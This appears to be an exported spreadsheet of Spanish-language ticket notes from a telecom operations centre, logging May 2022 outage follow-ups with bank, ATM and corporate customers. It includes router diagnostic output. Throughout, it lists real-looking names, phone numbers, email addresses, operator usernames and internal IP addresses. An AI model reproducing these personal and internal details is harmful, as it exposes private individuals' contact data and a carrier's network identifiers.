&lt;OBARGTBAN1T1D04A03EIM3&gt;DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS  10.103.15.38
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.103.15.0/25  DIRECT  0    0             D   10.103.15.1     VLANIF10
&lt;OBARGTBAN1T1D04A03EIM3&gt;PING -VP
&lt;OBARGTBAN1T1D04A03EIM3&gt;PING -VPN-INSTANCE  TRANSFERENCIAS  10.103.15.38
  PING 10.103.15.38: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
    REQUEST TIME OUT
  --- 10.103.15.38 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
&lt;OBARGTBAN1T1D04A03EIM3&gt;</t>
  </si>
  <si>
    <t>SE REVISA LA COLA DE CORREO AUN NO SE TIENE RESPUESTA DEL CLIENTE ESTAMOS A LA ESPERA QUE NOS CONFIRME POR VIA CORREO
ASUNTO: RE: SIN SERVICIO || 47504069T || 5B || CAJERO 4935 2 AV Z 1 STA ROSA DE LIMA SANTA ROSA SUPER MERCADO TONANTEL</t>
  </si>
  <si>
    <t>SE SOLICITA APOYO CON LA REVISION DE EQUIPOS EN ATM
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO PARA EL ATM: ATM_4935, SOLICITAMOS SU APOYO CON LO REQUERIDO EN CORREO ANTERIOR.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>INFORMA HECTOR DE MONITOREO 5B QUE SE TIENE PROBLEMA CON EL CONTADOR EN EL LUGAR EN DONDE ESTA INSTALADO ATM, TIENEN CORREO INTERNO INDICANDO QUE ESTA SEMANA ESTARAN REPARANDO PERO NO TIENEN FECHA EXACTA, POR LO QUE SE DEJARA EN PENDIENTE CLIENTE A LA ESPERA DE LA REPARACION.
ID
3001504278
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:23
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 31/05/2022 18:50:16</t>
  </si>
  <si>
    <t>F4582925</t>
  </si>
  <si>
    <t>SE LLAMA A PERSONAL CENTRAL BANTRAB VICTOR TECUN 37610279 QUIEN VALIDA QUE YA SERVICIO SE ENCUENTRA OPERATIVO Y AUTORIZA CIERRE DE TICKET, ADICIONAL TAMBIAN AUTORIZA CIERRE DE TICKET APRA F4583411
3001111316
COLA:
NOMBRE: A: 37610279
NÚMERO: 37610279
DURACIÓN: 0:04:46
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 37610279
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 30/05/2022 15:02:11</t>
  </si>
  <si>
    <t>F4583065</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONATAN O ROCIO  AL 23319770 SIGUE SIN  RESPONDER || SE INTENTARA LUEGO **
ID 3001075882
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 23464900 TRANSFIEREN LA LLAMADA AL AREA CORRESPONDIENTE PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001984360</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 23464900  CONTESTA LA SEÑORITA ESTEFANI SANABRIA QUIEN INDICA QUE TRANSFERIRA LA LLAMADA A ADMINISTRACION PERO NO CONTESTAN LLAMADA || SE INTENTARA LUEGO **
ID 2001971117
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONATAN O ROCIO  AL 23319770  NO RESPONDE || SE INTENTARA LUEGO **
ID 2001999171
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONATAN O ROCIO  AL 23319770 SIGUE SIN  RESPONDER || SE INTENTARA LUEGO **
ID 3001039865
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMER MOLINA AL 22399701  INDICA QUE AUN VE CAIDO EL SERVICIO SOLICITA QUE SE LE LLAME AL 23464900 CON LA PERSONA DE INFORMATICA **
ID 2001970260
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 23464900  TRANSFIEREN LA LLAMADA AL AREA CORRESPONDIENTE CONTESTA EL SEÑOR DARWIN GARCIA DE INFORMATICA SE TENIA EN LINEA PERO SE CORTA LLAMADA SE INTENTA LLAMAR NUEVAMENTE CONTESTA Y SOLICITA QUE SE LLAME AL SEÑOR  JHONATAN O ROCIO AL 23319770 **
ID 2001996185 -2001997733
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILMER MOLINA 79000377 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001983996</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONATAN O ROCIO  AL 23319770  NO RESPONDE || SE INTENTARA LUEGO **
ID 3001025157
**</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE 23319770 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001135215</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JHONATAN O ROCIO  AL 23319770 SIGUE SIN  RESPONDER || SE INTENTARA LUEGO **
ID 3001064785
**</t>
  </si>
  <si>
    <t>F4583080</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR MEJIA 77221226 ENVIA DIRECTAMENTE A BUZON
-ID 3001103688 - 3001103935</t>
  </si>
  <si>
    <t>LLAMADAS AL GDN NO COMPLETAN, SE LLAMA A CLIENTE VICTOR MEJIA 77221226, SE LE PIDE APOYO PARA UBICAR SU PLANTA PBX Y REINICIARLA, SOLICITA SE LE LLAME EN 15 MINUTOS EN LO QUE LO REINICIA. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>INFORMA CLIENTE VICTOR MEJÍA 77221226 QUE TIENE DAÑADA SU PBX, SOLICITA SE LE LLAME EN HORAS DE LA TARDE PARA VALIDAR (NO INDICA HORA) YA QUE LLEGARÁN EN EL TRANCURSO DEL DIA PARA REVISARLO. ID DE LLAMADA: 2001977230</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR MEJIA AL 0050377221226 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001099444
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE VICTOR MEJIA PERO ENVIA A BUZON.
3001096674
COLA:
NOMBRE: A: 0050377221226
NÚMERO: 0050377221226
DURACIÓN: 0:00:33
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377221226
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 30/05/2022 14:10:58</t>
  </si>
  <si>
    <t>F4583081</t>
  </si>
  <si>
    <t>CLIENTE COMENTE QUE NO UBICA EL EQUIPO, UNICAMENTE NOS INDICA QUE ENCONTRO UNA ALM -  ROJO SIN EMBARGO CLIENTE DESCONOCOCE LA MARCA DEL EQUIPO, SE LE INDICA AL CLIENTE QUE SE ENVIARA PERSONAL TECNICO A REVISAR LA UM Y VALIDAR LOS EQUIPOS EN SITIO, CLIENTE INDICA QUE NO ES NECESARIO TRAMITAR PERMISO PERO EN LA GARITA INDICA QUE SE LE INDIQUE QUE VIENEN A REVISAR LA LINEA DE FAX
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NOS INDICA QUE HAY PERSONAL DE LA PBX VERIFICANDO LA MISMA PERO QUE POR EL MOMENTO NO HAN ENCONTRADO PROBLEMAS, CLIENTE NOS APOYA UBICANDO LOS EQUIPOS EN SITIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ARIA RECINOS 50004054
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4583083</t>
  </si>
  <si>
    <t>SE ADJUNTA GRAFICAS EN SM  Y SE ENVIO CORREO A CLIENTE
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, POR ESTE MEDIO ADJUNTO GRÁFICAS CON RESPECTO AL ENLACE DE COFINO STAHL Y COMPANIA, 20 CALLE ZONA 10.
SALUDOS.</t>
  </si>
  <si>
    <t>F4583084</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR MEJIA AL 77221226 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001972380
**</t>
  </si>
  <si>
    <t>F4583099</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 77935111 NAIM ORDOÑEZ ATIENDE LLAMADAS COMPLETAN.
3001010630
COLA:
NOMBRE: A: 77935111
NÚMERO: 77935111
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 77935111
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 10:15:44</t>
  </si>
  <si>
    <t>CLIENTE IMAR MONROY 49890959 UBICA EQUIPO ETX-1 ALARMADO, PROCEDE A REINICIARLO PERO SERVICIO CONTINUA CAIDO. SE ABRIRÁ WO. ID: 2001969176
ESTADO ETX-1
PWR   ROJO
CH3   VERDE
CH4   VERDE</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE   IMAR MONROY NO RESPONDE.
3001011674
COLA:
NOMBRE: A: 49890959
NÚMERO: 49890959
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 49890959
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 10:18:05
3001011827
COLA:
NOMBRE: A: 49890959
NÚMERO: 49890959
DURACIÓN: 0:00:01
ESTADO: MARCANDO
DETALLES: 49890959
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 10:18:31</t>
  </si>
  <si>
    <t>F4583103</t>
  </si>
  <si>
    <t>**SE LE LLAMA A CLIENTE ELVIN CHANG AL 55550232 INDICA QUE NUEVAMENTE EL PROBLEMA SE DIO AL ENCENDER LOS EQUIPOS QUE SE QUEDA TRABADO Y NO LO DEJA INGRESAR TIENE QUE VOLVER A CERRAR TODO E INGRESAR NUEVAMENTE Y YA CON ESO EL SERVICIO SE QUEDA ESTABLE SOLICITA QUE SE LE DE SEGUIMIENTO NUEVAMENTE EL DIA DE MAÑANA A LAS 7:30  AM O QUE EL ESTARA LLAMANDO Y NO ENCENDERA NADA HASTA ESPERAR HACER LAS PRUEBAS **
ID 3001537423
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN CHANG AL 55550232 SOLICITA QUE SE LE LLAME EN 10 MIN NUEVAMENTE QUE NO HA LLEGADO A OFICINA**
ID 3001773029
**</t>
  </si>
  <si>
    <t>**SE LLAMA A ELVIN SAY AL 55550232 INDICA QUE SIEMPRE LE DIO EL MISMO INCONVENIENTE POR LA MAÑANA EL SERVICIO Y AHORITA YA ESTA ESTABLE  NUEVAMENTE INIDCA QUE ES UN PAR DE MINUTOS QUE SE LE CAE Y VUELVE A FUNCIONAR || SE NOTIFICA A GESTOR **
ID 3001258432
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FREDY GARCIA 55550306 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA ESTABLE QUE LA INESTABILIDAD SE DA DE 7:00 A 8:0 AM **
ID 2001988665
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE SELVIN CHANG AL 55550232 INDICA QUE YA ESTA EN OFICINA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001774848
**</t>
  </si>
  <si>
    <t>F4583117</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN LOPEZ 41856203 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001981540</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTIAN LOPEZ 41856203 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001973892 - 2001974050</t>
  </si>
  <si>
    <t>F4583128</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELICA NATAN 46691496 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001979694</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELICA NATAN 46691496 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001989448</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EUDEZ 31032448 NO SE TIENE RESPUESTA, SE INTENTARA LUEGO
-ID 2001989839</t>
  </si>
  <si>
    <t>F4583131</t>
  </si>
  <si>
    <t>jose.arias</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE MARCO OVALLE Y SE REINICIO EQUIPO ASMI52 Y PBX PERO EL SERVICIO NO LEVANTO, SE LOGRÓ VER APAGADO DE ASMI 52 EN REPISA LRS 24, CLIENTE INDICA QUE NO TIENE LLAMADAS ENTRE EXTENCIONES, CLIENTE INDICÓ QUE PROCEDERÍA A LLAMAR A SU PROVEEDOR Y SE LE LLAMARÁ DENTRO DE 2 HORAS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4583142</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDUARDO AL 94531935 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001991702
**</t>
  </si>
  <si>
    <t>F4583146</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE HERNANDEZ 79554935 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001995701</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSUE HERNANDEZ 79554935 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMDA EN 10 MIN
-ID 2001991603</t>
  </si>
  <si>
    <t>F4583149</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE 56366015 -- VICKY HERNANDEZ -   INDICA QUE SU PBX NO REACCIONA, TUVIERON PROBLEMAS DE ENERGIA- + QUE APLICARON RESET PERO LOS TELEFONOS SIGUEN COMMPLETAMENTE MUERTOS, SE LE XPLICA A CLIENTE QUE A NIVEL DE CLARO TODO OK - Y QUE DEBDIO A LO QUE NOS HA INDICADO, DEBE ESCALAR INMEDITAMENTE A SU PROVEEDOR DE PBX DEBIDO A QUE CLARO NO BRINDA SOPORTE A PLANTAS
2001973610
COLA:
NOMBRE: A: 56366015
NÚMERO: 56366015
DURACIÓN: 0:05:15
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 56366015
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 08:35:44</t>
  </si>
  <si>
    <t>SE TIENE A CLIENE EN LINEA - 56366015 -- VICKY HERNANDEZ ---</t>
  </si>
  <si>
    <t>SE LLAMA ACLIENTE  JAVIER SAQUIL-59516637    --- SE TIENE EN LINEA ||  DINCIA QUE NOS COMUNIQUEMOS CON 56366015 -- VICKY HERNANDEZ
2001972870
COLA:
NOMBRE: A: 59516637
NÚMERO: 59516637
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 59516637
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 08:28:46</t>
  </si>
  <si>
    <t>F4583150</t>
  </si>
  <si>
    <t>SE LLAMA A LA AGENCIA CONTESTA SEÑORITA GISELA, INDICA QUE EN EFECTO DESCONOCE SI LOS EQUIPOS DE RED TIENEN UPS, COMENTA QUE REPORTARA INCIDENTE AL AREA DE SOPORTE INTERNO COMENTA QUE SE TARDARAN APROXIMADAMENTE UNA SEMANA EN DETECTAR FALLA Y SOLVENTAR, POR LO QUE SOLICITA SE LE LLAME LA PROXIMA SEMANA EL DIA MIERCOLES 8 DE JUNIO || SE MANTENDRA ENLACCE EN OBSERVACION HASTA DICHA FECHA.
3001140816
COLA:
NOMBRE: A: 56331289
NÚMERO: 56331289
DURACIÓN: 0:04:18
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 56331289
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 30/05/2022 16:23:06</t>
  </si>
  <si>
    <t>CLIENTE SOLICITA QUE SE LLAME NUEVAMENTE EL DÍA MIERCOLES 8 DE JUNIO</t>
  </si>
  <si>
    <t>F4583161</t>
  </si>
  <si>
    <t>TABLA DE ESCALAMIENTO METRO PLANTA EXTERNA METRO NORTE				
	WO OPEN                        	0		8:50:00
1/4	JULIO NAVARIJO 	58261602	2 HORAS	10:50:00
2/4	MARVIN CHUM	58265122	3 HORAS	11:50:00
3/4	RENE AGUSTIN	58261183	5 HORAS	13:50:00
4/4	RODOLFO MORALES	58261609	6 HORAS	14:50:00</t>
  </si>
  <si>
    <t>F4583162</t>
  </si>
  <si>
    <t>CLIENTE GIANCARLO GUEVARA 79678997 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO.
RESULTADO: LLAMADA HECHA
NOMBRE: 0050379678997
NÚMERO: 0050379678997
INICIO: HOY, 11:31 A. M.
FIN: HOY, 11:31 A. M.
DURACIÓN: 0:45
ID DE LLAMADA: 3001040999</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE GIANCARLO GUEVARA 79678997, SE DIRIGE A DONDE ESTÁN LOS EQUIPOS. ID: 2001987262</t>
  </si>
  <si>
    <t>CLIENTE UBICA EQUIPO ASMI54 ALARMADO, PROCEDE A REINICIARLO PERO CONTINUA EN EL MISMO ESTADO, SE ABRIRA WO
ASMI54L
PWR     VERDE
ALM     ROJO
SYNC1 ROJO</t>
  </si>
  <si>
    <t>F4583168</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENDRICK MARTINEZ 40330527  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001980603</t>
  </si>
  <si>
    <t>F4583190</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE LEO 71486025 MENCIONA QUE YA TOODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001994730</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LEO AL 71486025 INDICA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME EN 20 MIN**
ID 2001986766
**</t>
  </si>
  <si>
    <t>F4583193</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLA AVILA-52267340  SE TIENE EN LINEA
2001985439
COLA:
NOMBRE: A: 52267340
NÚMERO: 52267340
DURACIÓN: 0:01:22
ESTADO: CONECTADA
DETALLES: 52267340
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 09:08:30</t>
  </si>
  <si>
    <t>CLIENTE REALIZA PRUEBAS Y VALIDA ##</t>
  </si>
  <si>
    <t>F4583199</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE 23095489 MENCIONA QUE EL IT ESTARA LLEGANDO MAÑANA POR LO QUE SOLICITA LLAMADA PARA
MAÑANA A LAS 10:00
-ID 3001137004</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 23095489 CONTESTA EL  AGENTE DANIEL GUEVARA  E INDICA QUE TUVIERON UNA DELIGENCIA Y NO PUDIERON LLEVAR AL PERSONAL DE IT INIDCA QUE ELLOS ESTARAN DEVOLVIENDO LLAMADA CUANDO LLEGUE EL PERSONAL DE IT **
ID  3001313323
**
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PERSONAL DE TURNO AL 23095489 CONTESTA EL AGENTE FRANCISCO HERCULES ,  SE DEJA EN LINEA CON GESTOR PARA REALIZAR PRUEBAS**
ID 2001990407
**</t>
  </si>
  <si>
    <t>SE LE EXPONE A FRANCISCO QUE NO SE TIENE EQUIPOS DE RED LAN ASOCIANDOSE AL ROUTER SE LE EXPONE QUE DEBERAN DE ESCALARLO CON IT PARA VALIDAR INCONVENIENTE INDICA QUE NO TIENEN TIEMPO ESTIMADO DE DIA O FECHA QUE VENDRAN INFORMATICA. SE LLAMARA A LAS 12 MD PARA VALIDAR SI TIENEN TIEMPO APROXIMADO DE LA REVISION DE SU AREA DE INFORMATICA.
IP2393002#SH IP ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.130.95.177           0   F063.F937.95CC  ARPA   FASTETHERNET4
INTERNET  10.130.95.181           -   F872.EA33.6AD4  ARPA   FASTETHERNET4
INTERNET  192.168.124.113         -   F872.EA33.6AD0  ARPA   VLAN1
IP2393002#
IP2393002#PING 1.1.1.1 SOURCE VLAN1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 1.1.1.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 192.168.124.113
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 32/35/36 MS
IP2393002#</t>
  </si>
  <si>
    <t>F4583206</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANGELICA BONILLA 506 86733592 NO RESPONDE, ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001992758
**</t>
  </si>
  <si>
    <t>F4583225</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 16:30
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; MESA DE AYUDA HONDURAS &lt;MESADEAYUDAHN@ITSINFOCOM.COM&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CALL CENTER VIP &lt;CALLCENTER.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: SERVICE DESK HN &lt;SERVICEDESKHN@ITSINFOCOM.COM&gt;; 'TELECOMHN' &lt;TELECOMHN@BANRURAL.COM.HN&gt;
ASUNTO: RE: CAIDA BANRURAL | FCM_TALANGA_CLARO | 30/05/2022 | ID00868
*-*-*-*</t>
  </si>
  <si>
    <t>F4583226</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EL SERVICIO DE E1 YA LE ESTA FUNCIONANDO PERO TIENE PROBLEMAS CON EL SERVICIO DE WIFI, SEGUN INDICA PERSONAL EN PUNTO QUE ES NECESARIO UN REPETIDOR PARA EL CLIENTE, SIN EMBARGO CLIENTE DESCONOCE EL EQUIPO Y QUE NO SABE DONDE CONSEGUIRLO Y QUE QUIERE QUE CLARO SE LO PROPORCIONE DENTRO DEL PLAN CORPORATIVO DEL SERVICIO DE INTERNET QUE POSEE, SE LE INDICA AL CLIENTE QUE EN ESTE CASO SE TIENE QUE DAR SEGUIMIENTO CON EL EJECUTIVO/EJECUTIVA COMERCIAL PARA VALIDAR SI SE PUEDE REALIZAR CAMBIOS O AÑADIR EQUIPO A SU PLAN CLIENTE QUEDA ENTERADO, FAVOR CC SV DAR SEGUIMIENTO ESTE TEMA CON EL AREA CORRECTA. FALLA DEL E1 SOLVENTADA, SE PROCEDE CON EL CIERRE DE CASO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE SALVADOR ALBERTO SANTANA-79511317  --- ## SE TIENE EN LINEA
3001011871
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:12
ESTADO: MARCANDO
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 10:18:50
3001011722
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 10:18:36
3001011241
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 10:18:10</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SALVADOR ALBERTO SANTANA-79511317
2001991810
COLA:
NOMBRE: A: 0050379511317
NÚMERO: 0050379511317
DURACIÓN: 0:00:18
ESTADO: MARCANDO
DETALLES: 0050379511317
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 30/05/2022 09:24:58</t>
  </si>
  <si>
    <t>F4583241</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE RENE VASQUEZ,  INDICA QUE EL SERVICIO SE ENCUENTRA ESTABLE Y AUTORIZA CIERRE DE CASO
3001013459
COLA:
NOMBRE: A: 59428213
NÚMERO: 59428213
DURACIÓN: 0:01:15
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 59428213
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 10:23:56</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE RENE, INDICA QUE ESTARA REALIZANDO PRUEBAS Y QUE SE LE MARQUE EN 20 MINUTOS PARA VALIDAR
2001999646
COLA:
NOMBRE: A: 59428213
NÚMERO: 011 50259428213
DURACIÓN: 0:01:23
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50259428213
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 30/05/2022 09:47:48</t>
  </si>
  <si>
    <t>F4583251</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRRY HERNANDEZ 54672093 MENCIONA QUE NO CUENTAN CON ENERGIA EN PR DESDE AYER
-ID 3001001984 - 3001002191</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRRY HERNANDEZ 54672093 MENCIONA QUE ESTARA VALIDANDO CON PR POR LO QUE SOLICITA LLAMDA EN 10 MIN
-ID 2001997032</t>
  </si>
  <si>
    <t>F4583259</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL MARTINEZ 43386064 - 37872629 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001000770 - 3001001430</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL MARTINEZ 37872629 - 43386064  NO SE TIENE RESPUESTA, SE INTENTARA LUEGO
-ID 3001006059 - 3001006601</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 77957600 SE SOLICITA HABLAR CON EL SEÑOR SAMUEL MARTINEZ, VALIDA EL SERVICIO, INDICA QUE TUVIERON PROBLEMAS DE ENERGIA. SE PROCEDE AL CIERRE .
3001014339
COLA:
NOMBRE: A: 77957600
NÚMERO: 77957600
DURACIÓN: 0:00:20
ESTADO: CONECTADA
DETALLES: 77957600
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 10:24:40</t>
  </si>
  <si>
    <t>F4583262</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE  MOLINA 42418536 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001999162</t>
  </si>
  <si>
    <t>F4583266</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 81007981 MENCIONA QUE NO SE ENCUENTRA EN PR PERO BRINDA CONTACTO 77630361 - MIUREL
-ID 3001017538</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77630361 - MIUREL MENCIONA QUE PRESENTARON PROBLEMA DE ENERGIA Y APLICARON REINICIO
CLIENTE INFORMA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001019744</t>
  </si>
  <si>
    <t>F4583268</t>
  </si>
  <si>
